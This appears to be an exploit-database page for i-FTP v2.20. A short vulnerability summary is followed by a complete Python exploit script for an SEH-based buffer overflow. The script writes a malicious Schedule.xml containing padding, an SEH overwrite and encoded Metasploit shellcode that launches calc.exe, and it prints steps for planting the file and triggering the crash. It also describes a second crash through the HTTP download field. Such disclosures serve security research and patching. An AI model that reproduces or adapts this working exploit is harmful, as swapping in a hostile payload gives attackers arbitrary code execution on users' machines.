header-logo
Suggest Exploit
vendor:
i-FTP
by:
metacom
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: i-FTP
Affected Version From: i.Ftp v2.20
Affected Version To: i.Ftp v2.20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2014

i-FTP Buffer Overflow SEH

This exploit takes advantage of a buffer overflow vulnerability in i-FTP v2.20, allowing an attacker to execute arbitrary code. The exploit uses a return address overwrite technique to redirect program execution flow to the attacker's shellcode. The shellcode payload used in this exploit spawns the Windows calculator. The exploit has been tested on various Windows platforms, including Win7 32bit, Win8.1 64bit, and Win XPsp3.

Mitigation:

Apply the latest security patch or upgrade to a newer version of i-FTP.
Source

Exploit-DB raw data:

#!/usr/bin/python
#Exploit Title:i-FTP Buffer Overflow SEH
#Homepage:http://www.memecode.com/iftp.php
#Software Link:www.memecode.com/data/iftp-win32-v220.exe
#Version:i.Ftp v2.20 (Win32 Release)
#Vulnerability discovered:26.10.2014
#Description:Simple portable cross platform FTP/SFTP/HTTP client.
#Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN
#Exploit Author:metacom  --> twitter.com/m3tac0m

import struct
def little_endian(address):
  return struct.pack("<L",address)
poc ="\x41" * 591
poc+="\xeb\x06\x90\x90" 
poc+=little_endian(0x1004C31F)#1004C31F   5E   POP ESI
poc+="\x90" * 80
# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R 
#| msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x20\x22" -t c
poc+=("\x89\xe7\xda\xce\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4d\x59\x35\x50"
"\x53\x30\x55\x50\x43\x50\x4d\x59\x4d\x35\x46\x51\x39\x42\x55"
"\x34\x4c\x4b\x51\x42\x30\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b"
"\x51\x42\x32\x34\x4c\x4b\x54\x32\x31\x38\x44\x4f\x58\x37\x30"
"\x4a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x57\x4c"
"\x33\x51\x43\x4c\x44\x42\x46\x4c\x31\x30\x4f\x31\x58\x4f\x44"
"\x4d\x45\x51\x38\x47\x5a\x42\x5a\x50\x31\x42\x46\x37\x4c\x4b"
"\x46\x32\x42\x30\x4c\x4b\x30\x42\x47\x4c\x55\x51\x48\x50\x4c"
"\x4b\x51\x50\x44\x38\x4b\x35\x39\x50\x44\x34\x30\x4a\x53\x31"
"\x48\x50\x46\x30\x4c\x4b\x51\x58\x35\x48\x4c\x4b\x51\x48\x57"
"\x50\x45\x51\x58\x53\x4b\x53\x47\x4c\x47\x39\x4c\x4b\x37\x44"
"\x4c\x4b\x53\x31\x58\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e"
"\x4c\x59\x51\x58\x4f\x54\x4d\x43\x31\x39\x57\x56\x58\x4b\x50"
"\x33\x45\x4b\x44\x43\x33\x43\x4d\x5a\x58\x47\x4b\x53\x4d\x31"
"\x34\x52\x55\x4a\x42\x50\x58\x4c\x4b\x50\x58\x57\x54\x43\x31"
"\x49\x43\x55\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x45"
"\x4c\x55\x51\x58\x53\x4c\x4b\x34\x44\x4c\x4b\x43\x31\x38\x50"
"\x4c\x49\x30\x44\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x51\x4a\x36\x31\x4b\x4f\x4b\x50\x36\x38\x51\x4f\x51\x4a"
"\x4c\x4b\x55\x42\x4a\x4b\x4d\x56\x51\x4d\x42\x4a\x53\x31\x4c"
"\x4d\x4b\x35\x58\x39\x33\x30\x35\x50\x33\x30\x56\x30\x33\x58"
"\x30\x31\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4b"
"\x4e\x44\x4e\x56\x52\x5a\x4a\x53\x58\x39\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x34\x46\x33\x4c\x54\x4a\x4b"
"\x30\x4b\x4b\x4b\x50\x53\x45\x45\x55\x4f\x4b\x50\x47\x52\x33"
"\x42\x52\x42\x4f\x42\x4a\x55\x50\x31\x43\x4b\x4f\x4e\x35\x53"
"\x53\x55\x31\x32\x4c\x45\x33\x46\x4e\x52\x45\x44\x38\x52\x45"
"\x55\x50\x41\x41")
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc 
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit =  header + footer
filename = "Schedule.xml"
file = open(filename , "w")
file.write(exploit)
print "\n[*]Vulnerable Created Schedule.xml!"
print "[*]Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp"
print "[*]Start IFTP"
print "[*]----------------------------------------------------"
file.close()
print '''
[+]Second Vulnerability
[-]You can also enter the contents 20000 A of the file in the -->
 * HTTP -> HTTP Download --> Option "FILE" to cause this crash
 * Access violation - code c0000005 (!!! second chance !!!)
 * 0:003> !exchain
 * 016fff2c: 41414141
 * Invalid exception stack at 41414141'''